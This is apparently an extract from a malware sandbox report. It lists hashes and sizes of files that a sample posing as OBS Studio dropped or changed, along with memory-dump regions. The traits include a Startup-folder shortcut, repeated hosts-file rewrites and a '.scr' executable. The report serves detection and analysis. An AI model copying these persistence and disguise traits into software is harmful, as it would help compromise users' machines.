SHA512fd4b71353f32e55926fddbf22e1e4b8c4bb619295410ce34beabcb63f5714e652790cd798f790ba4f22a4d07fa6ae1909a60e4141522f1adaf6b84ddafcd24e3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS.lnkFilesize
391B
MD5612b32a6b6df414cef6696d7fda53fb1
SHA1c512aa6169d377efafb52b94fc14925a91cf904b
SHA2566b6dc161b0839b626576da0a2e24e3e77670fedd23fc9ddb582f80dc60cb014a
SHA512b179f50c7f0326f1be4a65c248e6018e0953bf579b878fcb1c1f8661cf83897cb0a828a23adc689cbe36374125abc357a04959380ee8ebb0b745602fc78f064f
-
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xmlFilesize
3KB
MD5bf8d4925b769054a2c10ac106931a2fc
SHA15d5ea16c0f1a23d09a6a2abff0eebb4e98ebe92f
SHA2565d4fc0de1f26e7961659f9866bfdd4c3043b9ecb099a691dc045d7e627a1febc
SHA512fc21c3ce087ea5e609150e9c4645811873274312d20fc136a1909a58d70b790b1106ce964cf38a16cbb0fd67b32e603a1689568deed1c046b412c8ab2a305310
-
C:\Windows\system32\drivers\etc\hostsFilesize
861B
MD5ccaab279e1a808f65f24f8cf9f76ce9d
SHA14f03dffdb7468fcd96d701c2a1a1f62f056e3cc9
SHA2564e6391c2a6b4eb748e3b83906b2cfe743f9645db6f2d44732a12247e62c2963e
SHA5121af8d3ed35eb928bce408aa8ba2aad8eb4dc92717d7deb00ece007ced8381ebed82a27e6ec17bf9e747cce9f51f38e686e9edfd20c5920691f1f1bd15e89e5ca
-
C:\Windows\system32\drivers\etc\hostsFilesize
902B
MD57b214d6d95ff114c808d1e64c43c7f2d
SHA1ec8626bc0b1e557e6137691f4eaeb8fa9a99009d
SHA256eebfe6d36feca8765826753f10403a16620618ffb779eca61d017192e64e26e2
SHA5120d46da98af73cf44be51b0f4d41ad4d3463db0ea9d815bac660748ba116f12ac2b1937fbb0143f97b46b82c6577dd185e7aa5722e3b1acd08d15b04b5bf217fd
-
C:\Windows\system32\drivers\etc\hostsFilesize
942B
MD555334a37089780f18eeaa70f3b274baf
SHA1c14598167d692accf83ccd22004b176f59c557b6
SHA256fea20c810ea7f8ddc49f2326d3b7479b2ca87bb9673428d21f08ce22ad37b58c
SHA5129451de09b5b5b6f4a90bbdb499a68866e0633076df110cf103932dda00b9f29e771ebe06acb61c1ff283e7b4c7192d37ecc598adae7d98fd651a225eb9894289
-
C:\Windows\system32\drivers\etc\hostsFilesize
981B
MD52920a7646681f086f0c966310c80d1d5
SHA19df9b6a4a7392eaa629cdf508352dbd61de218b3
SHA2565875b7277289a610ccb534655f8883b80df2671cc09f8143fd558120e1038c55
SHA512d7777a81ed48a5343c0177bb37e5f4ce9818dd063ef7f57514b7894d74f7e839660113937ada69b4e42700404a116161fbf7027710e1b6c1de1b78a4a3c7aa3c
-
C:\Windows\system32\drivers\etc\hostsFilesize
1019B
MD5ea0aba7b4b47f684b5a758f6569c3d77
SHA11e3230fb86e0c2bbda5fed9b0d6c7150517ec775
SHA2565d1ae84aba859fce0ba763cd2481d898c550a76bcc091258636f50a117388fd3
SHA512c2a1096ad7a34619e9dbea4a0959e2eefef1e96a752a580eb41fe8e79f978699018257be145de749fb546092b8347b1c133acbe5d6c7b1ca57f331c71e5d74c4
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD505997c72e4639716e7ddb5fd4278d861
SHA17b96b82400f547504f6ee32274868e9787d11420
SHA256c0bff3a300c6a9f3e692d640f6318f05b45ae72b8f164b9a40344a91c6bce36a
SHA51216697c60fd67964c66ead5823617516eba14400b09df3da9c7ee77c549d7e2c74b560d7a4607a537012733552cf52898bbcae1e334e7e65062958cca245a39b5
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD55ae4d1fcb2d9d07d5fe778fae7ef6ff0
SHA1883d394492e1899951866fbb43da5392708e53a3
SHA256113205caf212653ef0b70a7382d5f77bd68243d0f81be755d045d54e268f825e
SHA512a0f1984d0eed0db2d82f992bd50817f9af3534e2a0a8aa72aff5bd8eb4addcc850bc6bf9cd20bc9a140bff05dbf3b79647a9fb76275b96e6f966300e6950d8b5
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5cd95ea96dabf6c7b2aa729c5f033ec53
SHA11cff2eeb87582dd88872960f84250e48143d472b
SHA256043fc19c6cd1f211d21fae9461d8c0a47bab025f8266e5384b8fd9565fc953ac
SHA512dd3d0a2e31eef7cd3c3ec00fe0aeaf248e51ed66543665959ecbf3ad7faeb55f77a408022fd748a5d7edff33f567c31cfbc867c8b292d003d10a43bec5c3b908
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5f9fb3575e73b4f707942d3efa582147a
SHA140f28d3cdc95ee46349cba64e9f0e9fd8fd8ba37
SHA256cfd6e5acb71babb125d3f8f048f5d378c404c8a8ef1b120debbb0b1aaead6d5d
SHA51256b8c6e7273cd752bc8b5841d45606cc2fbf919ac72312b1df7dbd57e6764e8bf979025ec8e1ca4ae5dda37f5090e4e6e26acacf1da90fea4b37a1c6a3a098bd
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5163d82b281219a265e6f035021c76670
SHA13defa289b4e14550ee9e2083d79fbb271fe4b97f
SHA25662591c30bea18f749063b8f1a8ee325c3bc44550d0811313c17fce71b8754e9e
SHA512fb6f01fa686a5fe70a8ad35b2bf0e7ffac93a06ef2176cdb186003f4576958c435a753d9609f001af7de9ce4d31096ffb54ff3f68ea700f0d1714142e965790e
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD50298c46468b2ec577565a92bcd2114a0
SHA1c996b85993a2412213de6ea3bf9ee12ac89a6fba
SHA25608525c2616d669c081322d463e65892d66083384ffd781e229af4c0de9450a40
SHA512942f164527165840286c5b12fe3b314dfaade9c546abf260cedaff0cfa90a5784739991fdd7fae8d6c56138d45e2e2450161312dc4dd90ff3f3856e251f17f90
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD59f8eec90e96b330b1ff59776077fc3e2
SHA1842f418d71df86676b69a4ebdbb2c94473dea5db
SHA256c50dd21ba1400408267a24c9ce11d55da7817cbd1bc37c2059e65e91a097ac46
SHA512273d5863df64cf2edd299c7832edf50ec39c8860068405349301f8df36e922c6690cca7fd1bfe40b7a920d01db56b5fb980a17e4e34c21802b254d3fc0353c0c
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD55858bb84aed5be16c369a0a14d0f3bcc
SHA175183ccbd219e798f8b091931adad94524a2fb84
SHA2566ada142f57568e0922c2ac4439370497f587afd1646ab27d5d789d73cf1b107e
SHA51264f473084623479ea7b7329cb37a26d30a64be0b6395e469b10ff187d489882b21570ac1f9200f17535ef2ba632549cd9bf6b8f1c848373c549a1b58fabf1615
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5872e498bf571eda19f2394020ace3eaa
SHA1a7a0e41ccdebd26c6a59b19464b2f31a005ebb8d
SHA2569e904c48e66473f9f86765ad04d8f8d1a07340083e41fe4ce1d011df6ef06850
SHA51233335e256c33718bc1edb339956fe495dc8ef997906092c3b344902eaa13ed4c87062a58c7f3f5f89a70edcbbb563581124dc5441c1c19f0208bec9b3150b715
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5f0b9e5d0f4303314ad1cdc1d6aadac2d
SHA1cbdadc878feb9f302cc70e72e9d31f6791ca33fe
SHA256fdd521b3aa3d680d26c65ed67ac5cc1943e5861b61741653671243460119c4f3
SHA512840419f6112e37baf1b337507e2f646cdf6c20f5242292f8a541652c3b414354f36e3e67eae4be084e5eec626a28757736a439dcc3ea3ae707454a7737df0518
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5960502a0ae88ef892ead60dc6b2fb6a9
SHA1df7869a276b705db6675ba1976b4f392eb2f2e49
SHA256af6f265dbb05a8cb23d580442732df055eb9cd7156567040a90b01710485e4f6
SHA512470260588909a5da5590b5a278fc6d545a0535f72da81271d27106af13ceaef7713eea8eb0c9ad0d2cd542938acc6cf532977ff216c12424aa5d048de361264f
-
C:\tmp\.vbsFilesize
211B
MD5dea060bb5064255907ca7ae046275a7d
SHA131338df88179fbaa01879a4721aaeb773d37bc5b
SHA25665a573682c0e582d623c81e7f3bcacfb23b7a74cea835e815af0081a7380ca9d
SHA512b4228463e6f3dc47d4e57754421944da4ffe273e2d783ecbfac1650e31c5ecfa3c143780d8bce24716ffba852f97e94e13198ea40d550da6f7daac0d72328ada
-
C:\tmp\obs32.dllFilesize
3.6MB
MD5beb538b0efb64d3c5634ba703fbc7505
SHA1089e448a0f0c8b1c80592364e84cc3ce5519ebcc
SHA256945be3370712e192b2827a132935ec99a9ca52b87a6bd642f9afdc96f87d07fb
SHA51208f402bb7e4735072588741779f181a015a47454100f0c97c032b75793f2a6c35673ab5bfa5bb2da61a37d4c843991e3a4a78102fb0866e58addc64fc9406e90
-
C:\tmp\obs32.dllFilesize
3.6MB
MD5beb538b0efb64d3c5634ba703fbc7505
SHA1089e448a0f0c8b1c80592364e84cc3ce5519ebcc
SHA256945be3370712e192b2827a132935ec99a9ca52b87a6bd642f9afdc96f87d07fb
SHA51208f402bb7e4735072588741779f181a015a47454100f0c97c032b75793f2a6c35673ab5bfa5bb2da61a37d4c843991e3a4a78102fb0866e58addc64fc9406e90
-
C:\tmp\obs32.dllFilesize
3.6MB
MD5beb538b0efb64d3c5634ba703fbc7505
SHA1089e448a0f0c8b1c80592364e84cc3ce5519ebcc
SHA256945be3370712e192b2827a132935ec99a9ca52b87a6bd642f9afdc96f87d07fb
SHA51208f402bb7e4735072588741779f181a015a47454100f0c97c032b75793f2a6c35673ab5bfa5bb2da61a37d4c843991e3a4a78102fb0866e58addc64fc9406e90
-
C:\tmp\obs64.exeFilesize
9.3MB
MD5e819bc0aa0a2b76f4d5aa3e0a5a7dcf4
SHA1160b58c2d333cb20517898f0a91e505e49560860
SHA256d5558276830a38aab027a6201e169ec7463253ad144befe9a27f8f996c78e433
SHA51279c0c3766f7cc531b156dc9ad51955d4f412e8694b4e3d8db1f49d911204656451b6977b736b23db85cbfe00ecc15c5ab1ad5ca26a3988b5e52969ff6d271045
-
C:\tmp\obs64.exeFilesize
9.3MB
MD5e819bc0aa0a2b76f4d5aa3e0a5a7dcf4
SHA1160b58c2d333cb20517898f0a91e505e49560860
SHA256d5558276830a38aab027a6201e169ec7463253ad144befe9a27f8f996c78e433
SHA51279c0c3766f7cc531b156dc9ad51955d4f412e8694b4e3d8db1f49d911204656451b6977b736b23db85cbfe00ecc15c5ab1ad5ca26a3988b5e52969ff6d271045
-
C:\tmp\obs64.exeFilesize
9.3MB
MD5e819bc0aa0a2b76f4d5aa3e0a5a7dcf4
SHA1160b58c2d333cb20517898f0a91e505e49560860
SHA256d5558276830a38aab027a6201e169ec7463253ad144befe9a27f8f996c78e433
SHA51279c0c3766f7cc531b156dc9ad51955d4f412e8694b4e3d8db1f49d911204656451b6977b736b23db85cbfe00ecc15c5ab1ad5ca26a3988b5e52969ff6d271045
-
C:\tmp\obs64.scrFilesize
9.0MB
MD58a43b78256248131b7ef4ec9ce5dc5c2
SHA150ee27c73291e0a5027d29fde20571ab66d9e5fa
SHA256e93832ec29ff60c65860876dc6f06ddc6374be8179385c48316d4469c3225e4f
SHA512761dcbadb99091f89ff9ef21993bfa462d3bc7da84f940e5ba8043fce8122e2be02ba729f42ed74ba09db57b24876d891bb2b7594c81ea4bbd373b6848026467
-
C:\tmp\obs64.scrFilesize
9.0MB
MD58a43b78256248131b7ef4ec9ce5dc5c2
SHA150ee27c73291e0a5027d29fde20571ab66d9e5fa
SHA256e93832ec29ff60c65860876dc6f06ddc6374be8179385c48316d4469c3225e4f
SHA512761dcbadb99091f89ff9ef21993bfa462d3bc7da84f940e5ba8043fce8122e2be02ba729f42ed74ba09db57b24876d891bb2b7594c81ea4bbd373b6848026467
-
C:\tmp\obs64.scrFilesize
9.0MB
MD58a43b78256248131b7ef4ec9ce5dc5c2
SHA150ee27c73291e0a5027d29fde20571ab66d9e5fa
SHA256e93832ec29ff60c65860876dc6f06ddc6374be8179385c48316d4469c3225e4f
SHA512761dcbadb99091f89ff9ef21993bfa462d3bc7da84f940e5ba8043fce8122e2be02ba729f42ed74ba09db57b24876d891bb2b7594c81ea4bbd373b6848026467
-
memory/380-164-0x0000000000000000-mapping.dmp
-
memory/444-194-0x0000000000000000-mapping.dmp
-
memory/604-159-0x0000000000000000-mapping.dmp
-
memory/664-162-0x0000000000000000-mapping.dmp
-
memory/796-232-0x0000000000000000-mapping.dmp
-
memory/864-288-0x00007FFECEA10000-0x00007FFECF4D1000-memory.dmpFilesize
10.8MB
-
memory/864-287-0x00007FFECEA10000-0x00007FFECF4D1000-memory.dmpFilesize
10.8MB
-
memory/864-286-0x0000017A612C0000-0x0000017A612E2000-memory.dmpFilesize
136KB
-
memory/928-226-0x0000000000000000-mapping.dmp
-
memory/984-207-0x0000000000000000-mapping.dmp
-
memory/996-191-0x0000000000000000-mapping.dmp
-
memory/1060-187-0x0000000000000000-mapping.dmp
-
memory/1252-186-0x0000000000000000-mapping.dmp
-
memory/1416-171-0x0000000000000000-mapping.dmp
-
memory/1460-168-0x0000000000000000-mapping.dmp
-
memory/1476-185-0x0000000000000000-mapping.dmp
-
memory/1584-174-0x0000000000000000-mapping.dmp
-
memory/1632-196-0x0000000000000000-mapping.dmp
-
memory/1660-203-0x0000000000000000-mapping.dmp
-
memory/1700-176-0x0000000000000000-mapping.dmp
-
memory/1824-160-0x0000000000000000-mapping.dmp
-
memory/1844-175-0x0000000000000000-mapping.dmp
-
memory/1956-189-0x0000000000000000-mapping.dmp
-
memory/2000-132-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/2000-137-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/2000-142-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/2084-151-0x0000000000000000-mapping.dmp
-
memory/2084-155-0x00007FFECF310000-0x00007FFECF823000-memory.dmpFilesize
5.1MB
-
memory/2112-298-0x00007FFECEA10000-0x00007FFECF4D1000-memory.dmpFilesize
10.8MB
-
memory/2120-285-0x0000000003580000-0x0000000003627000-memory.dmpFilesize
668KB
-
memory/2120-279-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-283-0x0000000003580000-0x0000000003627000-memory.dmpFilesize
668KB
-
memory/2120-282-0x0000000011000000-0x0000000011158000-memory.dmpFilesize
1.3MB
-
memory/2120-281-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-280-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-275-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-284-0x0000000011000000-0x0000000011158000-memory.dmpFilesize
1.3MB
-
memory/2120-277-0x0000000000400000-0x0000000000855000-memory.dmpFilesize
4.3MB
-
memory/2120-290-0x0000000003580000-0x0000000003627000-memory.dmpFilesize
668KB
-
memory/2124-163-0x0000000000000000-mapping.dmp
-
memory/2208-221-0x0000000000000000-mapping.dmp
-
memory/2232-198-0x0000000000000000-mapping.dmp
-
memory/2380-215-0x0000000000000000-mapping.dmp
-
memory/2392-188-0x0000000000000000-mapping.dmp
-
memory/2432-214-0x0000000000000000-mapping.dmp
-
memory/2436-225-0x0000000000000000-mapping.dmp
-
memory/2536-173-0x0000000000000000-mapping.dmp
-
memory/2696-219-0x0000000000000000-mapping.dmp
-
memory/2832-172-0x0000000000000000-mapping.dmp
-
memory/2968-182-0x0000000000000000-mapping.dmp
-
memory/3000-143-0x0000000000000000-mapping.dmp
-
memory/3056-212-0x0000000000000000-mapping.dmp
-
memory/3204-230-0x0000000000000000-mapping.dmp
-
memory/3236-241-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/3236-251-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/3236-247-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/3472-178-0x0000000000000000-mapping.dmp
-
memory/3496-184-0x0000000000000000-mapping.dmp
-
memory/3568-228-0x0000000000000000-mapping.dmp
-
memory/3572-158-0x0000000000000000-mapping.dmp
-
memory/3692-181-0x0000000000000000-mapping.dmp
-
memory/3724-201-0x0000000000000000-mapping.dmp
-
memory/3764-177-0x0000000000000000-mapping.dmp
-
memory/3836-205-0x0000000000000000-mapping.dmp
-
memory/3936-190-0x0000000000000000-mapping.dmp
-
memory/4024-167-0x0000000000000000-mapping.dmp
-
memory/4076-170-0x0000000000000000-mapping.dmp
-
memory/4116-180-0x0000000000000000-mapping.dmp
-
memory/4120-202-0x0000000000000000-mapping.dmp
-
memory/4152-217-0x0000000000000000-mapping.dmp
-
memory/4228-264-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/4228-253-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/4228-249-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/4232-179-0x0000000000000000-mapping.dmp
-
memory/4268-273-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-278-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-274-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-272-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4268-268-0x0000000000400000-0x0000000000C0E000-memory.dmpFilesize
8.1MB
-
memory/4296-183-0x0000000000000000-mapping.dmp
-
memory/4420-169-0x0000000000000000-mapping.dmp
-
memory/4492-223-0x0000000000000000-mapping.dmp
-
memory/4532-165-0x0000000000000000-mapping.dmp
-
memory/4548-134-0x0000000000000000-mapping.dmp
-
memory/4576-166-0x0000000000000000-mapping.dmp
-
memory/4580-209-0x0000000000000000-mapping.dmp
-
memory/4740-148-0x0000000000000000-mapping.dmp
-
memory/4740-153-0x0000000002C80000-0x0000000003193000-memory.dmpFilesize
5.1MB
-
memory/4844-210-0x0000000000000000-mapping.dmp
-
memory/4912-138-0x0000000000000000-mapping.dmp
-
memory/4964-144-0x0000000000000000-mapping.dmp
-
memory/5004-161-0x0000000000000000-mapping.dmp
-
memory/5068-147-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5068-140-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5068-139-0x0000000000000000-mapping.dmp
-
memory/5068-255-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5104-193-0x0000000000000000-mapping.dmp